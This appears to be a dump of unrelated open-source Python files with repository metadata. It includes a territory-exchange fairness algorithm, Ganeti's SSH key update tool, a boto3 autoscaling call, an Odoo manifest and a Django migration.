first1 = (np.array(sati1)[:, 0] * selection1).value # прибавление удовлетворённости первой страны
second1 = (np.array(sati1)[:, 1] * selection1).value # прибавление удовлетворённости второй страны
if (first1 != 0 or second1 != 0): # если хоть одной из них лучше
self.i_exch2 += 1 # счётчик обменов увеличивает
for j in range(len(selection1.value)): # для всех переданных
if selection1[j].value:
if j < a: # если от первой страны второй
self.redact_exch(first[j][0], first[j][1], one, two) # учитываем влияение на карты допустимых обменов
self.belong(first[j][0], first[j][1], two, 'Exchange ' + str(min(sides1, sides2)))
else: # если от второй страны первой
j2 = j - a
self.redact_exch(second[j2][0], second[j2][1], two, one) # учитываем влияение на карты допустимых обменов
self.belong(second[j2][0], second[j2][1], one, 'Exchange ' + str(min(sides1, sides2)))
exch_info = str(sorted([int(sum(selection1.value[:a])), int(sum(selection1.value[a:]))]))
if self.exchanged[1].get(exch_info) == None:
self.exchanged[1][exch_info] = 1
else:
self.exchanged[1][exch_info] += 1
if self.exchanged[2].get(int(sum(selection1.value))) == None:
self.exchanged[2][int(sum(selection1.value))] = 1
else:
self.exchanged[2][int(sum(selection1.value))] += 1
return 1
return 0
# УЧЁТ ВЛИЯНИЕ ПЕРЕДАЧИ УЧАСТКА НА КАРТЫ ОПУСТИМЫХ ОБМЕНОВ (первая координата, вторая координата, от какой страны, какой стране)
def redact_exch(self, first, last, one, two):
if (first != 0) and (len(self.map_exchange[one][first - 1][last]) == 1) and (self.unos[first - 1][last][2] not in [one + 1, 0, -1]) and not self.unos[first - 1][last][1]:
self.list_exchange[self.unos[first - 1][last][2] - 1][one].remove([first - 1, last])
if (first != len(self.unos) - 1) and (len(self.map_exchange[one][first + 1][last]) == 1) and (self.unos[first + 1][last][2] not in [one + 1, 0, -1]) and not self.unos[first + 1][last][1]:
self.list_exchange[self.unos[first + 1][last][2] - 1][one].remove([first + 1, last])
if (last != 0) and (len(self.map_exchange[one][first][last - 1]) == 1) and (self.unos[first][last - 1][2] not in [one + 1, 0, -1]) and not self.unos[first][last - 1][1]:
self.list_exchange[self.unos[first][last - 1][2] - 1][one].remove([first, last - 1])
if (last != len(self.unos[0]) - 1) and (len(self.map_exchange[one][first][last + 1]) == 1) and (self.unos[first][last + 1][2] not in [one + 1, 0, -1]) and not self.unos[first][last + 1][1]:
self.list_exchange[self.unos[first][last + 1][2] - 1][one].remove([first, last + 1])
# добавить в список нового своих соседей
if (first != 0) and (len(self.map_exchange[two][first - 1][last]) == 0) and (self.unos[first - 1][last][2] not in [two + 1, 0, -1]) and not self.unos[first - 1][last][1]:
self.list_exchange[self.unos[first - 1][last][2] - 1][two].append([first - 1, last])
if (first != len(self.unos) - 1) and (len(self.map_exchange[two][first + 1][last]) == 0) and (self.unos[first + 1][last][2] not in [two + 1, 0, -1]) and not self.unos[first + 1][last][1]:
self.list_exchange[self.unos[first + 1][last][2] - 1][two].append([first + 1, last])
if (last != 0) and (len(self.map_exchange[two][first][last - 1]) == 0) and (self.unos[first][last - 1][2] not in [two + 1, 0, -1]) and not self.unos[first][last - 1][1]:
self.list_exchange[self.unos[first][last - 1][2] - 1][two].append([first, last - 1])
if (last != len(self.unos[0]) - 1) and (len(self.map_exchange[two][first][last + 1]) == 0) and (self.unos[first][last + 1][2] not in [two + 1, 0, -1]) and not self.unos[first][last + 1][1]:
self.list_exchange[self.unos[first][last + 1][2] - 1][two].append([first, last + 1])
# убрать себя из списка соседей и добавить нового себя в список соседей
team1 = []
enemy1 = []
if (first != 0) and (self.unos[first - 1][last][2] not in [-1, 0]):
if self.unos[first - 1][last][2] != one + 1:
team1.append(self.unos[first - 1][last][2])
if self.unos[first - 1][last][2] != two + 1:
enemy1.append(self.unos[first - 1][last][2])
if (first != len(self.unos) - 1) and (self.unos[first + 1][last][2] not in [-1, 0]):
if self.unos[first + 1][last][2] != one + 1:
team1.append(self.unos[first + 1][last][2])
if self.unos[first + 1][last][2] != two + 1:
enemy1.append(self.unos[first + 1][last][2])
if (last != 0) and (self.unos[first][last - 1][2] not in [-1, 0]):
if self.unos[first][last - 1][2] != one + 1:
team1.append(self.unos[first][last - 1][2])
if self.unos[first][last - 1][2] != two + 1:
enemy1.append(self.unos[first][last - 1][2])
if (last != len(self.unos[0]) - 1) and (self.unos[first][last + 1][2] not in [-1, 0]):
if self.unos[first][last + 1][2] != one + 1:
team1.append(self.unos[first][last + 1][2])
if self.unos[first][last + 1][2] != two + 1:
enemy1.append(self.unos[first][last + 1][2])
for elem in list(set(team1)):
self.list_exchange[one][elem - 1].remove([first, last])
for elem in list(set(enemy1)):
self.list_exchange[two][elem - 1].append([first, last])
self.map_exchange[-1][first][last] = [] #обнуление своего счётчика
# составление своего счётчика
if (first != 0) and (self.map_exchange[two][first - 1][last] == []) and (self.unos[first - 1][last][2] == two + 1) and not self.unos[first - 1][last][1]:
self.map_exchange[-1][first][last].append([-1, 0])
if (first != len(self.unos) - 1) and (self.map_exchange[two][first + 1][last] == []) and (self.unos[first + 1][last][2] == two + 1) and not self.unos[first + 1][last][1]:
self.map_exchange[-1][first][last].append([1, 0])
if (last != 0) and (self.map_exchange[two][first][last - 1] == []) and (self.unos[first][last - 1][2] == two + 1) and not self.unos[first][last - 1][1]:
self.map_exchange[-1][first][last].append([0, -1])
if (last != len(self.unos[0]) - 1) and (self.map_exchange[two][first][last + 1] == []) and (self.unos[first][last + 1][2] == two + 1) and not self.unos[first][last + 1][1]:
self.map_exchange[-1][first][last].append([0, 1])
if len(self.map_exchange[one][first][last]) == 1: #обнуление счётчика бывшего
self.map_exchange[-1][self.map_exchange[one][first][last][0][0] + first][self.map_exchange[one][first][last][0][1] + last].remove([-self.map_exchange[one][first][last][0][0], -self.map_exchange[one][first][last][0][1]])
# возможно сам стал опасным
if len(self.map_exchange[two][first][last]) == 1:
self.map_exchange[-1][self.map_exchange[two][first][last][0][0] + first][self.map_exchange[two][first][last][0][1] + last].append([-self.map_exchange[two][first][last][0][0], -self.map_exchange[two][first][last][0][1]])
# возможно спас новых опасных
if (first != 0) and (len(self.map_exchange[two][first - 1][last]) == 1) and (self.unos[first - 1][last][2] == two + 1) and not self.unos[first - 1][last][1]:
self.map_exchange[-1][self.map_exchange[two][first - 1][last][0][0] + first - 1][self.map_exchange[two][first - 1][last][0][1] + last].remove([-self.map_exchange[two][first - 1][last][0][0], -self.map_exchange[two][first - 1][last][0][1]])
if (first != len(self.unos) - 1) and (len(self.map_exchange[two][first + 1][last]) == 1) and (self.unos[first + 1][last][2] == two + 1) and not self.unos[first + 1][last][1]:
self.map_exchange[-1][self.map_exchange[two][first + 1][last][0][0] + first + 1][self.map_exchange[two][first + 1][last][0][1] + last].remove([-self.map_exchange[two][first + 1][last][0][0], -self.map_exchange[two][first + 1][last][0][1]])
if (last != 0) and (len(self.map_exchange[two][first][last - 1]) == 1) and (self.unos[first][last - 1][2] == two + 1) and not self.unos[first][last - 1][1]:
self.map_exchange[-1][self.map_exchange[two][first][last - 1][0][0] + first][self.map_exchange[two][first][last - 1][0][1] + last - 1].remove([-self.map_exchange[two][first][last - 1][0][0], -self.map_exchange[two][first][last - 1][0][1]])
if (last != len(self.unos[0]) - 1) and (len(self.map_exchange[two][first][last + 1]) == 1) and (self.unos[first][last + 1][2] == two + 1) and not self.unos[first][last + 1][1]:
self.map_exchange[-1][self.map_exchange[two][first][last + 1][0][0] + first][self.map_exchange[two][first][last + 1][0][1] + last + 1].remove([-self.map_exchange[two][first][last + 1][0][0], -self.map_exchange[two][first][last + 1][0][1]])
# удаление старых соседств и прибавление новых
if first != 0:
self.map_exchange[one][first - 1][last].remove([1, 0])
self.map_exchange[two][first - 1][last].append([1, 0])
if first != len(self.unos) - 1:
self.map_exchange[one][first + 1][last].remove([-1, 0])
self.map_exchange[two][first + 1][last].append([-1, 0])
if last != 0:
self.map_exchange[one][first][last - 1].remove([0, 1])
self.map_exchange[two][first][last - 1].append([0, 1])
if last != len(self.unos[0]) - 1:
self.map_exchange[one][first][last + 1].remove([0, -1])
self.map_exchange[two][first][last + 1].append([0, -1])
# возможно сделал опасными старых
if (first != 0) and (len(self.map_exchange[one][first - 1][last]) == 1) and (self.unos[first - 1][last][2] == one + 1) and not self.unos[first - 1][last][1]:
self.map_exchange[-1][self.map_exchange[one][first - 1][last][0][0] + first - 1][self.map_exchange[one][first - 1][last][0][1] + last].append([-self.map_exchange[one][first - 1][last][0][0], -self.map_exchange[one][first - 1][last][0][1]])
if (first != len(self.unos) - 1) and (len(self.map_exchange[one][first + 1][last]) == 1) and (self.unos[first + 1][last][2] == one + 1) and not self.unos[first + 1][last][1]:
self.map_exchange[-1][self.map_exchange[one][first + 1][last][0][0] + first + 1][self.map_exchange[one][first + 1][last][0][1] + last].append([-self.map_exchange[one][first + 1][last][0][0], -self.map_exchange[one][first + 1][last][0][1]])
if (last != 0) and (len(self.map_exchange[one][first][last - 1]) == 1) and (self.unos[first][last - 1][2] == one + 1) and not self.unos[first][last - 1][1]:
self.map_exchange[-1][self.map_exchange[one][first][last - 1][0][0] + first][self.map_exchange[one][first][last - 1][0][1] + last - 1].append([-self.map_exchange[one][first][last - 1][0][0], -self.map_exchange[one][first][last - 1][0][1]])
if (last != len(self.unos[0]) - 1) and (len(self.map_exchange[one][first][last + 1]) == 1) and (self.unos[first][last + 1][2] == one + 1) and not self.unos[first][last + 1][1]:
self.map_exchange[-1][self.map_exchange[one][first][last + 1][0][0] + first][self.map_exchange[one][first][last + 1][0][1] + last + 1].append([-self.map_exchange[one][first][last + 1][0][0], -self.map_exchange[one][first][last + 1][0][1]])
# ОТДАЁТ САМЫЙ ВЫГОДНЫЙ УЧАСТОК ВТОРОЙ СТРАНЫ ПЕРВОЙ СТРАНЕ (номер первой и второй страны) возвращает индексы участка
def chari(self, maxi_i, mini_i): # и номер второй страны
sys.stdout.write("Charity: {0}, exchange: {1} ({4}), Try from {2} to {3} \r".format(str(self.i_char),
str(self.i_exch),
self.names[maxi_i],
self.names[mini_i], self.i_exch2))
ind_max = 0 # индекс найденного максимума
maximum = 0 # максимальная относительная разница пользы
for i in self.list_exchange[maxi_i][mini_i]: # проходим по всем участкам второй страны
firs = i[0]
las = i[1]
if ([self.countries[mini_i][1], self.countries[maxi_i][1]] < [self.countries[maxi_i][1] - 2 * self.unos[firs][las][4][maxi_i], self.countries[mini_i][1] + 2 * self.unos[firs][las][4][mini_i]]
and # если имеет смысл передать
# если её относительная польза больше
maximum < (self.unos[firs][las][4][mini_i] / (self.unos[firs][las][4][maxi_i] + sys.float_info.epsilon))):
maximum = (self.unos[firs][las][4][mini_i] / (self.unos[firs][las][4][maxi_i] + sys.float_info.epsilon))
ind_max = i # в индекс записывается очерёдность выбранного участка в множестве
if (ind_max != 0): # если максимум найден
self.redact_exch(ind_max[0], ind_max[1], maxi_i, mini_i) # учитываем влияение на карты допустимых обменов
self.belong(ind_max[0], ind_max[1], mini_i, 'Charity ') # передаём участок
return 1 #возвращаем что передали и номер второго участка
return 0
# ОТ САМОЙ БОГАТОЙ СТРАНЕ ОТДАЁТ БЕДНОЙ С ПОМОЩЬЮ CHARITY
def one_charity(self):
min1 = self.min_sat()[1] # запоминаем страну с наименьшей удовлеторённостью
max1 = self.max_sat()[1] # запоминаем страну с наибольшей удовлетворённостью
result = self.chari(max1, min1) # запоминаем что передали
while result: # пока имеет смысл отдавать
min1 = self.min_sat()[1] #повторяем
max1 = self.max_sat()[1]
result = self.chari(max1, min1)
# ОТ ВСЕХ СТРАН ОТДАЁТ САМОЙ БЕДНОЙ
def all_charity(self):
maxsat = self.max_sat()[1] # запоминаем самую богатую страну
self.one_charity() # от самой богатой отдаём самой бедной
self.ind[maxsat] = 1 # блокируем самую богатую
if self.ind.count(0) > 1: # если ещё есть кому отдавать, то повторяем
self.all_charity()
self.ind[self.max_sat_re()[1]] = 0 # возвращаем индикатор обратно
# ОТ ВСЕХ СТРАН ОТДАЁТ ВСЕМ(БОГАТЕЙШИЕ БЕДНЕЙШИМ)
def total_charity(self):
minsat = self.min_sat()[1] # запоминаем самую бедную страну
self.all_charity() # производим обмен от всех ей
self.ind[minsat] = 1 # блокируем её
if self.ind.count(0) > 1: # повтораяем с другой пока есть страны
self.total_charity()
else:
for i in range(len(self.ind)): # обнуляем инндикаторы
self.ind[i] = 0
## ВСПОМОГАТЕЛНЫЕ ФУНКЦИИ ДЛЯ ВЫВОДОВ
# ЗАВИСТЬ ПЕРВОЙ СТРАНЫ ВТОРОЙ СТРАНЕ (номер первой страны, номер второй страны)
def envy(self, coun_1, coun_2):
result = 0 # результат
for i in range(len(self.countries[coun_1][3])): # учитываем участки первой страны
result += self.unos[self.countries[coun_1][3][i][0]][self.countries[coun_1][3][i][1]][4][coun_1]
for i in range(len(self.countries[coun_2][3])): # учитываем участки второй страны
result -= self.unos[self.countries[coun_2][3][i][0]][self.countries[coun_2][3][i][1]][4][coun_1]
if self.percent == False:
return int(result)
return round(result, 3)
|
[
"noreply@github.com"
] |
vampiirre.noreply@github.com
|
53d12f540c00edd4490afc63f713584360966ba7
|
cec21b1d674aaf7d62d7730e637229577a2e27e2
|
/First_WebApp/counter.py
|
bb45d5e811601fba683b7e124370451ce0b1addd
|
[] |
no_license
|
arpitntripathi/first_WebApp
|
50028c0d792581f3c0639d07333d087035503e22
|
584095a61476bbc8c82d92e95526fa4008c788de
|
refs/heads/master
| 2022-12-23T23:52:01.117763
| 2020-09-12T20:34:29
| 2020-09-12T20:34:29
| 254,751,588
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 365
|
py
|
import operator
def count(article):
words = article.split()
word_count = len(words)
dict_words = {}
for word in words:
if word in dict_words:
dict_words[word] += 1
else:
dict_words[word] = 1
var_dict = sorted(dict_words.items(), key=operator.itemgetter(1), reverse=True)
return var_dict, word_count
|
[
"arpitnathtripathi@gmail.com"
] |
arpitnathtripathi@gmail.com
|
288a244c7b7b0c75beeca7844880dcf05b568272
|
ab41cbae15cbbaac52ec7db5da568b337d232bf6
|
/lib/tools/ssh_update.py
|
f9d1b6db3f56e7fcd50aa5b66a06fbe27614fb08
|
[
"BSD-2-Clause"
] |
permissive
|
skycover/ganeti-2.15.2
|
9d6eef72cd1c7942c7b293c4bcc4c0b62f880e9f
|
db69c3917c1ae00f31943c52c147c7938ce64d9c
|
refs/heads/master
| 2021-01-24T13:24:02.294516
| 2018-02-27T18:52:36
| 2018-02-27T18:52:36
| 123,173,553
| 0
| 0
| null | 2018-02-27T18:53:46
| 2018-02-27T18:53:46
| null |
UTF-8
|
Python
| false
| false
| 7,218
|
py
|
#
#
# Copyright (C) 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script to update a node's SSH key files.
This script is used to update the node's 'authorized_keys' and
'ganeti_pub_key' files. It will be called via SSH from the master
node.
"""
import os
import os.path
import optparse
import sys
import logging
from ganeti import cli
from ganeti import constants
from ganeti import errors
from ganeti import utils
from ganeti import ht
from ganeti import ssh
from ganeti import pathutils
from ganeti.tools import common
_DATA_CHECK = ht.TStrictDict(False, True, {
constants.SSHS_CLUSTER_NAME: ht.TNonEmptyString,
constants.SSHS_NODE_DAEMON_CERTIFICATE: ht.TNonEmptyString,
constants.SSHS_SSH_PUBLIC_KEYS:
ht.TItems(
[ht.TElemOf(constants.SSHS_ACTIONS),
ht.TDictOf(ht.TNonEmptyString, ht.TListOf(ht.TNonEmptyString))]),
constants.SSHS_SSH_AUTHORIZED_KEYS:
ht.TItems(
[ht.TElemOf(constants.SSHS_ACTIONS),
ht.TDictOf(ht.TNonEmptyString, ht.TListOf(ht.TNonEmptyString))]),
constants.SSHS_GENERATE: ht.TDictOf(ht.TNonEmptyString, ht.TString),
})
class SshUpdateError(errors.GenericError):
"""Local class for reporting errors.
"""
def ParseOptions():
"""Parses the options passed to the program.
@return: Options and arguments
"""
program = os.path.basename(sys.argv[0])
parser = optparse.OptionParser(
usage="%prog [--dry-run] [--verbose] [--debug]", prog=program)
parser.add_option(cli.DEBUG_OPT)
parser.add_option(cli.VERBOSE_OPT)
parser.add_option(cli.DRY_RUN_OPT)
(opts, args) = parser.parse_args()
return common.VerifyOptions(parser, opts, args)
def UpdateAuthorizedKeys(data, dry_run, _homedir_fn=None):
"""Updates root's C{authorized_keys} file.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
instructions = data.get(constants.SSHS_SSH_AUTHORIZED_KEYS)
if not instructions:
logging.info("No change to the authorized_keys file requested.")
return
(action, authorized_keys) = instructions
(auth_keys_file, _) = \
ssh.GetAllUserFiles(constants.SSH_LOGIN_USER, mkdir=True,
_homedir_fn=_homedir_fn)
key_values = []
for key_value in authorized_keys.values():
key_values += key_value
if action == constants.SSHS_ADD:
if dry_run:
logging.info("This is a dry run, not adding keys to %s",
auth_keys_file)
else:
if not os.path.exists(auth_keys_file):
utils.WriteFile(auth_keys_file, mode=0600, data="")
ssh.AddAuthorizedKeys(auth_keys_file, key_values)
elif action == constants.SSHS_REMOVE:
if dry_run:
logging.info("This is a dry run, not removing keys from %s",
auth_keys_file)
else:
ssh.RemoveAuthorizedKeys(auth_keys_file, key_values)
else:
raise SshUpdateError("Action '%s' not implemented for authorized keys."
% action)
def UpdatePubKeyFile(data, dry_run, key_file=pathutils.SSH_PUB_KEYS):
"""Updates the file of public SSH keys.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
instructions = data.get(constants.SSHS_SSH_PUBLIC_KEYS)
if not instructions:
logging.info("No instructions to modify public keys received."
" Not modifying the public key file at all.")
return
(action, public_keys) = instructions
if action == constants.SSHS_OVERRIDE:
if dry_run:
logging.info("This is a dry run, not overriding %s", key_file)
else:
ssh.OverridePubKeyFile(public_keys, key_file=key_file)
elif action in [constants.SSHS_ADD, constants.SSHS_REPLACE_OR_ADD]:
if dry_run:
logging.info("This is a dry run, not adding or replacing a key to %s",
key_file)
else:
for uuid, keys in public_keys.items():
if action == constants.SSHS_REPLACE_OR_ADD:
ssh.RemovePublicKey(uuid, key_file=key_file)
for key in keys:
ssh.AddPublicKey(uuid, key, key_file=key_file)
elif action == constants.SSHS_REMOVE:
if dry_run:
logging.info("This is a dry run, not removing keys from %s", key_file)
else:
for uuid in public_keys.keys():
ssh.RemovePublicKey(uuid, key_file=key_file)
elif action == constants.SSHS_CLEAR:
if dry_run:
logging.info("This is a dry run, not clearing file %s", key_file)
else:
ssh.ClearPubKeyFile(key_file=key_file)
else:
raise SshUpdateError("Action '%s' not implemented for public keys."
% action)
def GenerateRootSshKeys(data, dry_run):
"""(Re-)generates the root SSH keys.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
generate_info = data.get(constants.SSHS_GENERATE)
if generate_info:
suffix = generate_info[constants.SSHS_SUFFIX]
if dry_run:
logging.info("This is a dry run, not generating any files.")
else:
common.GenerateRootSshKeys(SshUpdateError, _suffix=suffix)
def Main():
"""Main routine.
"""
opts = ParseOptions()
utils.SetupToolLogging(opts.debug, opts.verbose)
try:
data = common.LoadData(sys.stdin.read(), _DATA_CHECK)
# Check if input data is correct
common.VerifyClusterName(data, SshUpdateError, constants.SSHS_CLUSTER_NAME)
common.VerifyCertificateSoft(data, SshUpdateError)
# Update / Generate SSH files
UpdateAuthorizedKeys(data, opts.dry_run)
UpdatePubKeyFile(data, opts.dry_run)
GenerateRootSshKeys(data, opts.dry_run)
logging.info("Setup finished successfully")
except Exception, err: # pylint: disable=W0703
logging.debug("Caught unhandled exception", exc_info=True)
(retcode, message) = cli.FormatError(err)
logging.error(message)
return retcode
else:
return constants.EXIT_SUCCESS
|
[
"vs@ipatov.net"
] |
vs@ipatov.net
|
48d78e65acb643608b7d9a129ff13c6c9954b465
|
c15a50057951317728f4eaa1854904b53161c19e
|
/FM_FTRL/ftrl_utils/params.py
|
1b77ef869aa96fceab4d0c0f42338693acfd1c7b
|
[] |
no_license
|
marvinxu-free/talking_data
|
8ca3ecab5ed5585fd0db46cebd27148e71495d2a
|
1549fe13dc9489255c3c87dd6c13a65a1176ea07
|
refs/heads/master
| 2020-03-16T05:41:15.437712
| 2018-05-10T02:56:27
| 2018-05-10T02:56:27
| 132,538,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
# -*- coding: utf-8 -*-
# Project: ml_more_algorithm
# Author: chaoxu create this file
# Time: 2018/4/16
# Company : Maxent
# Email: chao.xu@maxent-inc.com
import os
module_path = os.path.split(os.path.realpath(__file__))[0]
Data_path = os.path.realpath("{0}/../../input".format(module_path))
train_file = '{0}/train_new_subsample.csv'.format(Data_path)
train_file_tmp = '{0}/train_subsample_tmp.csv'.format(Data_path)
test_file = '{0}/test.csv'.format(Data_path)
test_file_tmp = '{0}/test_tmp.csv'.format(Data_path)
predict_report_file = '{0}/predict.csv'.format(Data_path)
best_weights_file = '{0}/best.hdf5'.format(Data_path)
batchsize = 10000000
D = 2 ** 20
|
[
"chao.xu@maxent-inc.com"
] |
chao.xu@maxent-inc.com
|
9eedcc25d03a6a9bc42984a3f718564309407905
|
48b50c0b525956fa2267b00021d52ca5ef715e81
|
/02-notifon/scale-up.py
|
061c708974183ea6f322a4a2c16cd5a2363eb13f
|
[] |
no_license
|
cashpole/automating-aws-with-python
|
2bcdb97fa4d7768a1a4ac581b16935262a20b27c
|
fb6bcf6da93f80fbd11944be080e7a34da993f3d
|
refs/heads/master
| 2022-12-08T20:09:59.514534
| 2019-07-01T19:18:07
| 2019-07-01T19:18:07
| 186,532,329
| 0
| 0
| null | 2022-09-08T08:22:31
| 2019-05-14T02:47:02
|
Python
|
UTF-8
|
Python
| false
| false
| 224
|
py
|
# coding: utf-8
import boto3
session = boto3.Session(profile_name='pythonAutomation')
as_client = session.client('autoscaling')
as_client.execute_policy(AutoScalingGroupName='Notifon Example Group', PolicyName='Scale Up')
|
[
"cashpole@hotmail.com"
] |
cashpole@hotmail.com
|
f5a22a136e56bae2893f9a941bb1b6af17239b3a
|
17c266cef1c620d729cb8a9e3d9f47ce389c8c8f
|
/createclass.py
|
5021f3d1d2e81f759b077fa10c3f8fa9e62f953d
|
[] |
no_license
|
mubasil/flavortown
|
2cdc66492dfb46bbb78b8d42ff8a5b489db7a9a3
|
68b4ec2179782916fba0aa204255a75bba459b53
|
refs/heads/rory
| 2021-01-21T12:11:48.035094
| 2017-11-30T23:22:34
| 2017-11-30T23:22:34
| 102,047,698
| 0
| 2
| null | 2017-11-30T23:23:23
| 2017-08-31T21:39:02
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 745
|
py
|
import csv
import json
import os
classifiers = []
recipeClasses = ["Asian", "Mexican", "Italian"]
for recipeClass in recipeClasses:
directory = os.path.join(os.getcwd(), recipeClass)
for filename in os.listdir(directory):
with open(os.path.join(directory, filename)) as fileinfo:
data = json.loads(fileinfo.read())
allIngredients = ""
for datum in data['Ingredients']:
allIngredients = allIngredients + " " + datum
classifiers.append({'query':allIngredients, 'classifier':recipeClass})
writer = csv.writer(open('train.csv', 'w'))
for row in classifiers:
writer.writerow([unicode(row['query']).encode("utf-8"), unicode(row['classifier']).encode("utf-8")])
|
[
"mubasil@yahoo.com"
] |
mubasil@yahoo.com
|
df7f090efeff95de6885e079eb45d56b1f1a4a2d
|
1a8d1f8c16fb2842a0b0f71b7860f0bff8e6d257
|
/car_report/__manifest__.py
|
02c686e7de5aa9cc9cb002abd93c5923d5e67add
|
[] |
no_license
|
vidtsin/odoo-leasing
|
85a288e4d47697591397b892cb65d911987aa991
|
5fd7a2fe23ae47d992bc03a9e474c08363c78b9e
|
refs/heads/master
| 2020-08-03T04:37:39.587593
| 2019-07-28T14:25:14
| 2019-07-28T14:25:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
# -*- coding: utf-8 -*-
{
'name': 'Car Report',
'version': '0.1',
'summary': 'Show car reports',
'sequence': 30,
'description': """
car
====================
The specific and easy-to-use car system in Odoo allows you to keep track of your vehicle.
""",
'category': 'car',
'website': '',
'author': "Cedric FOWOUE",
'images': [
'static/src/img/icon.png',
],
'depends': ['car_contract', 'car_payment'],
'data': [
'security/ir.model.access.csv',
'views/car_report.xml',
],
'qweb': [
"static/src/xml/car_report.xml",
"static/src/xml/car_report_follow.xml",
],
'installable': True,
'application': False,
'auto_install': False,
}
|
[
"cedvict@gmail.com"
] |
cedvict@gmail.com
|
4b18b019b2ff1da71c7219f94ea175182cf795a4
|
bd14632342076a8099dbbd51c1b0c71bc8352b6a
|
/main.py
|
85a29f77583d8b29671e15d3c458dd515102c514
|
[
"MIT"
] |
permissive
|
nlehuen/led_display
|
511fbb3f2d0260d4ae60f3a2e6a99d366d927281
|
6f77ac919f9f3d3972646a6f26907fefb79a3be2
|
refs/heads/master
| 2021-01-22T02:48:00.386193
| 2013-09-19T08:02:41
| 2013-09-19T08:02:41
| 5,821,282
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,604
|
py
|
# -*- coding: utf-8 -*-
import time
import traceback
import json
from configuration import Configuration
import animator
import animations
import importlib
# Try to load Twitter animations
try:
import animations.tweet
except ImportError:
print "Please install twitter module from http://pypi.python.org/pypi/twitter/"
animations.tweet = None
if __name__ == '__main__':
# Load configuration
configuration = Configuration.load('configuration.json')
# Try to connect to LED display through serial port
display = None
try:
import leddisplay
display = leddisplay.Display(
port = configuration.leddisplay.port.required().encode(),
speed = configuration.leddisplay.speed.required(),
threaded = True
)
except leddisplay.serial.SerialException, e:
print "Could not connect to serial port, launching display emulator"
print "\t%s"%e
except:
traceback.print_exc()
# If connection to LED display was not successfull,
# launch the emulator
if display is None:
import tkdisplay
display = tkdisplay.Display(
(
configuration.tkdisplay.width.value(32),
configuration.tkdisplay.height.value(16)
),
configuration.tkdisplay.scale.value(4)
)
# Create the animator
animator = animator.Animator(
display,
configuration.animator
)
# For the moment, run the animator in the main thread
try:
animator.mainloop()
finally:
display.close()
|
[
"nlehuen@google.com"
] |
nlehuen@google.com
|
76401ac4e722d051809095cd5b95aa29888ec01d
|
8485ac621de45db5db3a1faf248690650d951258
|
/tracker.py
|
d39f4122960155450e4719a98a2d22a93bca568b
|
[] |
no_license
|
gerardo8al/portfolio_tracker
|
610e538dfc315c870a6838d8ea68bf3766e8b838
|
5c27e71c00f1d729484afd6b8366b069c98246a4
|
refs/heads/master
| 2020-03-12T17:30:26.253308
| 2018-04-24T20:21:00
| 2018-04-24T20:21:00
| 130,737,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 700
|
py
|
from constants import *
import csv
import urllib.request
import json
def send_get_request(url):
response = urllib.request.urlopen(url)
json_back = response.read()
json_back = json.loads(json_back.decode('utf-8'))
#json_pretty_print(json_back)
return json_back
def json_pretty_print(parsed):
print(json.dumps(parsed, indent=4, sort_keys=True))
def main():
#The request returns a json that contains the info for
#all the tickers in exchange.
json_back = send_get_request(URL)
with open(CSV, 'rt') as f:
reader=csv.reader(f)
for row in reader:
ticker = row[0]
quantity = row[1]
if __name__ == "__main__":
main()
|
[
"gerardo8a@gmail.com"
] |
gerardo8a@gmail.com
|
b0514a0533d844c12afb5368772ef5d43d163ea9
|
490ac0cbeb1436a642d236381b277b07a86aff2a
|
/blog/migrations/0001_initial.py
|
19f8b37b13b8007b355b1319c3edd370ddfaf805
|
[] |
no_license
|
Marshall210/My_site
|
8f445ce073d75a6b3675c7876288ef6627b3859d
|
8130394070c382af510e2912772b0c9e830e619c
|
refs/heads/master
| 2020-07-21T11:08:50.900237
| 2019-09-22T14:12:17
| 2019-09-22T14:12:17
| 206,843,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
# Generated by Django 2.2.5 on 2019-09-20 18:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"tymchenko99978@gmail.com"
] |
